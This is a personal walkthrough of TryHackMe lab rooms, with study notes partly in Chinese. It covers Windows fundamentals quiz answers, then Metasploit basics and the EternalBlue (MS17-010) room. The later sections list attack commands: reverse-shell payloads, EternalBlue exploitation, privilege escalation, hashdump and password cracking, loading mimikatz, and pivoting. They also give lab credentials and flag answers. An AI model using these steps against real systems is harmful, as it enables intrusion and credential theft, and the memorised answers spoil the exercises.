Tryhackme-Windows Exploitation Basics

Windows Exploitation Basics

Windows Fundamentals 1

Machine IP: MACHINE_IP

User: administrator

Password: letmein123!

Task1 Introduction to Windows

Read above and start the virtual machine.

Task2 Windows Editions

What encryption can you enable on Pro that you can’t enable in Home?

Bitlocker

Task3 The Desktop (GUI)

1.Which selection will hide/disable the Search box?

Hidden

2.Which selection will hide/disable the Task View button?

Show Task View button

3.Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?

Action Center

Task4 The File System

What is the meaning of NTFS?

New Technology File System

Task5 The Windows\System32 Folders

What is the system variable for the Windows folder?

%windir%

Task6 User Accounts, Profiles, and Permissions’

1.What is the name of the other user account?

tryhackmebily

2.What groups is this user a member of?

Remote Desktop Users,Users

3.What built-in account is for guest access to the computer?

Guest

4.What is the account status?

Account is disabled

Task7 User Account Control

What does UAC mean?

User Account Control

User Account Control (UAC)

Task8 Settings and the Control Panel

In the Control Panel, change the view to Small icons. What is the last setting in the Control Panel view?

Windows Defender Firewall

Task9 Task Manager

What is the keyboard shortcut to open Task Manager?

Ctrl+Shift+Esc

Task10 Conclusion

Read above and terminate the Windows machine you deployed in this room.

Windows Fundamentals 2

Task1 Introduction

Read above and start the virtual machine

Task2 System Configuration

1.What is the name of the service that lists Systems Internals as the manufacturer?

PsShutdown

2.Whom is the Windows license registered to?

Windows Users

3.What is the command for Windows Troubleshooting?

C:\Windows\System32\control.exe /name Microsoft.Troubleshooting

4.What command will open the Control Panel? (The answer is the name of .exe, not the full path)

control.exe

Task3 Change UAC Settings

What is the command to open User Account Control Settings? (The answer is the name of the .exe file, not the full path)

UserAccountControlSetting.exe

Task4 Computer Management

1.What is the command to open Computer Management? (The answer is the name of the .msc file, not the full path)

compmgmt.msc

2.At what time every day is the GoogleUpdateTaskMachineUA task configured to run?

6:15 AM

3.What is the name of the hidden share?

sh4r3dF0Ld3r

Task5 System Information

1.What is the command to open System Information? (The answer is the name of the .exe file, not the full path)

msinfo32.exe

2.What is listed under System Name?

THM-WINFUN2

3.Under Environment Variables, what is the value for ComSpec?

%SystemRoot%\system32\cmd.exe

Task6 Resource Monitor

What is the command to open Resource Monitor? (The answer is the name of the .exe file, not the full path)

resmon.exe

Task7 Command Prompt

1.In System Configuration, what is the full command for Internet Protocol Configuration?

C:\Windows\System32\cmd.exe /k %windir%\system32\ipconfig.exe

2.For the ipconfig command, how do you show detailed information?

ipconfig /all

Task8 Registry Editor

What is the command to open the Registry Editor? (The answer is the name of the .exe file, not the full path)

regedt32.exe

Task9 Conclusion

Read above

Windows Fundamentals 3

User: administrator

Password: letmein123!

Task1 Introduction

Read the above and start the virtual machine

Task2 Windows Updates

Patch Tuesday-每月的第二个周二

命令行访问windows更新 control /name Microsoft.WindowsUpdate

There were two definition updates installed in the attached VM. On what date were these updates installed?

5/3/2021

Task3 Windows Security

In the above image, which area needs immediate attention?

Virus & threat protection

Task4 Virus & threat protection

Specifically, what is turned off that Windows is notifying you to turn on?

Real-time protection

Task5 Firewall & network protection

If you were connected to airport Wi-Fi, what most likely will be the active firewall profile?

public network

Task6 App & browser control

Read the above

Task7 Device security

What is the TPM?

Trusted Platform Module

Task8 BitLocker

What must a user insert on computers that DO NOT have a TPM version 1.2 or later?

usb startup key

BitLocker

要求 可信平台模块（TPM）版本1.2以上

Task9 Volume Shadow Copy Service

What is VSS?

Volume Shadow Copy Service

Volume Shadow Copy Service（VSS)

- 创建恢复点

- 执行系统恢复

- 配置恢复配置

- 删除恢复点

Task10 Conclusion

Read the above

Metasploit

Task1 Intro

Kali and most other security distributions of Linux include Metasploit by default. If you are using a different distribution of Linux, verify that you have it installed or install it from the Rapid 7 Github repository.

Task2 Initializing…

1.First things first, we need to initialize the database! Let’s do that now with the command:
If you’re using the AttackBox, you don’t need to do this.msfdb init

2.Before starting Metasploit, we can view some of the advanced options we can trigger for starting the console. Check these out now by using the command: msfconsole -h

3.We can start the Metasploit console on the command line without showing the banner or any startup information as well. What switch do we add to msfconsole to start it without showing this information? This will include the ‘-’

-q

-q, --quiet Do not print the banner on startup

4.Once the database is initialized, go ahead and start Metasploit via the command: msfconsole

5.After Metasploit has started, let’s go ahead and check that we’ve connected to the database. Do this now with the command: db_status

6.Cool! We’ve connected to the database, which type of database does Metasploit 5 use?

postgresql

Task3 Rock 'em to the Core [Commands]

1.Let’s go ahead and start exploring the help menu. On the Metasploit prompt (where we’ll be at after we start Metasploit using msfconsole), type the command: help

2.The help menu has a very short one-character alias, what is it?

?

3.Finding various modules we have at our disposal within Metasploit is one of the most common commands we will leverage in the framework. What is the base command we use for searching?

search

4.Once we’ve found the module we want to leverage, what command we use to select it as the active module?

use

5.How about if we want to view information about either a specific module or just the active one we have selected?

info

6.Metasploit has a built-in netcat-like function where we can make a quick connection with a host simply to verify that we can ‘talk’ to it. What command is this?

connect

7.Entirely one of the commands purely utilized for fun, what command displays the motd/ascii art we see when we start msfconsole (without -q flag)?

banner

8.We’ll revisit these next two commands shortly, however, they’re two of the most used commands within Metasploit. First, what command do we use to change the value of a variable?

set

9.Metasploit supports the use of global variables, something which is incredibly useful when you’re specifically focusing on a single box. What command changes the value of a variable globally?

setg

10.Now that we’ve learned how to change the value of variables, how do we view them? There are technically several answers to this question, however, I’m looking for a specific three-letter command which is used to view the value of single variables.

get

11.How about changing the value of a variable to null/no value?

unset

12.When performing a penetration test it’s quite common to record your screen either for further review or for providing evidence of any actions taken. This is often coupled with the collection of console output to a file as it can be incredibly useful to grep for different pieces of information output to the screen. What command can we use to set our console output to save to a file?

spool

spool将控制台输出保存到文件

13.Leaving a Metasploit console running isn’t always convenient and it can be helpful to have all of our previously set values load when starting up Metasploit. What command can we use to store the settings/active datastores from Metasploit to a settings file? This will save within your msf4 (or msf5) directory and can be undone easily by simply removing the created settings file.

save

Task4 Modules for Every Occasion!

1.Easily the most common module utilized, which module holds all of the exploit code we will use?

exploit

2.Used hand in hand with exploits, which module contains the various bits of shellcode we send to have executed following exploitation?

payload

3.Which module is most commonly used in scanning and verification machines are exploitable? This is not the same as the actual exploitation of course.

Auxiliary

4.One of the most common activities after exploitation is looting and pivoting. Which module provides these capabilities?

POST

5.Commonly utilized in payload obfuscation, which module allows us to modify the ‘appearance’ of our exploit such that we may avoid signature detection?

Encoder

6.Last but not least, which module is used with buffer overflow and ROP attacks?

NOP

7.Not every module is loaded in by default, what command can we use to load different modules?

load

*Note, this diagram includes both the interfaces and *most* of the modules. This diagram does not include the ‘Post’ module.

Task5 Move that shell!

1.Metasploit comes with a built-in way to run nmap and feed it’s results directly into our database. Let’s run that now by using the command db_nmap -sV MACHINE_IP

2.What service does nmap identify running on port 135?

msrpc

3.Let’s go ahead and see what information we have collected in the database. Try typing the command into the msfconsole now.hosts

4.How about something else from the database, try the command now.services

5.One last thing, try the command now. This won’t show much at the current moment, however, it’s worth noting that Metasploit will keep track of discovered vulnerabilities. One of the many ways the database can be leveraged quickly and powerfully. vulns

6.Now that we’ve scanned our victim system, let’s try connecting to it with a Metasploit payload. First, we’ll have to search for the target payload. In Metasploit 5 (the most recent version at the time of writing) you can simply type followed by a unique string found within only the target exploit. For example, try this out now with the following command . What is the full path for our exploit that now appears on the msfconsole prompt? *This will include the exploit section at the startuse``use icecast

exploit/windows/http/icecast_header

7.While that use command with the unique string can be incredibly useful that’s not quite the exploit we want here. Let’s now run the command . search multi/handler

Go ahead and run the command wherein the number will be what appears in that far left column (typically this will be 4 or 5). In this way, we can use our search results without typing out the full name/path of the module we want to use.use NUMBER_NEXT_TO exploit/multi/handler

---

What is the name of the column on the far left side of the console that shows up next to ‘Name’?

8.Now type the command . This is the short way to use modules returned by search results. use NUMBER_FROM_PREVIOUS_QUESTION

9.Next, let’s set the payload using this command . In this way, we can modify which payloads we want to use with our exploits. Additionally, let’s run this command . You might have to check your IP using the command , it will likely be your tun0 interface.set PAYLOAD windows/meterpreter/reverse_tcp``set LHOST YOUR_IP_ON_TRYHACKME``ip addr

10.Let’s go ahead and return to our previous exploit, run the command to select it again.use icecast

11.One last step before we can run our exploit. Run the command to tell Metasploit which target to attack. set RHOSTS MACHINE_IP

12.Once you’re set those variables correctly, run the exploit now via either the command or the command to run this as a job.exploit``run -j

13.Once we’ve started this, we can check all of the jobs running on the system by running the command jobs

14.After we’ve established our connection in the next task, we can list all of our sessions using the command . Similarly, we can interact with a target session using the command sessions``sessions -i SESSION_NUMBER

Task6 We’re in, now what?

1.First things first, our initial shell/process typically isn’t very stable. Let’s go ahead and attempt to move to a different process. First, let’s list the processes using the command . What’s the name of the spool service? ps

spoolsv.exe

2.Let’s go ahead and move into the spool process or at least attempt to! What command do we use to transfer ourselves into the process? This won’t work at the current time as we don’t have sufficient privileges but we can still try!

migrate

migrate <pid值> #将Meterpreter会话移植到指定pid值进程中

3.Well that migration didn’t work, let’s find out some more information about the system so we can try to elevate. What command can we run to find out more information regarding the current user running the process we are in?

getuid

4.How about finding more information out about the system itself?

sysinfo

5.This might take a little bit of googling, what do we run to load mimikatz (more specifically the new version of mimikatz) so we can use it?

load kiwi

6.Let’s go ahead and figure out the privileges of our current user, what command do we run?

getprivs

7.What command do we run to transfer files to our victim computer?

upload

8.How about if we want to run a Metasploit module?

run

9.A simple question but still quite necessary, what command do we run to figure out the networking information and interfaces on our victim?

ipconfig

10.Let’s go ahead and run a few post modules from Metasploit. First, let’s run the command run . This will determine if we’re in a VM, a very useful piece of knowledge for further pivoting.post/windows/gather/checkvm

11.Next, let’s try: . This will check for various exploits which we can run within our session to elevate our privileges. Feel free to experiment using these suggestions, however, we’ll be going through this in greater detail in the room Ice.run post/multi/recon/local_exploit_suggester

12.Finally, let’s try forcing RDP to be available. This won’t work since we aren’t administrators, however, this is a fun command to know about: run post/windows/manage/enable_rdp

13.One quick extra question, what command can we run in our meterpreter session to spawn a normal system shell?

shell

shell – 在会话中生成shell

Task7 Makin’ Cisco Proud

1.Let’s go ahead and run the command , this will pull up the help menu for autoroute. What command do we run to add a route to the following subnet: 172.18.1.0/24? Use the flag in your answer.run autoroute -h``-n

run autoroute -s 172.18.1.0 255.255.255.0

2.Additionally, we can start a socks5 proxy server out of this session. Background our current meterpreter session and run the command . What is the full path to the socks5 auxiliary module?search server/socks5

auxiliary/server/socks4a

3.Once we’ve started a socks server we can modify our /etc/proxychains.conf file to include our new server. What command do we prefix our commands (outside of Metasploit) to run them through our socks5 server with proxychains?

– proxychains

Blue⭐️MS17-010 ⭐️Metasploit

task1 Recon

1.Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)

nmap -sV -vv --script vuln IP

2.How many ports are open with a port number under 1000?

3

3.What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

MS17-010

MS17-101(Eternal blue永恒之蓝)

task2 Gain Access

1.Start [Metasploit]

无需回答

2.Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/…)

exploit/windows/smb/ms17_010_eternalblue

3.Show options and set the one required value. What is the name of this value? (All caps for submission)

RHOSTS

4.Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:

set payload windows/x64/shell/reverse_tcp

With that done, run the exploit!

另外需要设置RHOSTS,RPORT,LHOST,LPORT

5.Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

task3 Escalate

1.If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

post/multi/manage/shell_to_meterpreter

百度shell_to_meterpreter,使用post/multi/manage/shell_to_meterpreter模块将shell升级为metepreter

2.Select this (use MODULE_PATH). Show options, what option are we required to change?

SESSION

3.Set the required option, you may need to list all of the sessions to find your target here.

4.Run! If this doesn’t work, try completing the exploit from the previous task once more.

5.Once the meterpreter shell conversion completes, select that session for use.

6.Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

7.List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

8.Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.

task4 Cracking

1.Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Jon

hashdump的输出格式为 用户名:SID:LM哈希:NTLM哈希

2.Copy this password hash to a file and research how to crack it. What is the cracked password?

alqfna22

task5 Find flags!

1.Flag1? This flag can be found at the system root.

flag{access_the_machine}

2.Flag2? This flag can be found at the location where passwords are stored within Windows.

Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.

flag{sam_database_elevated_access}

3.flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

flag{admin_documents_can_be_valuable}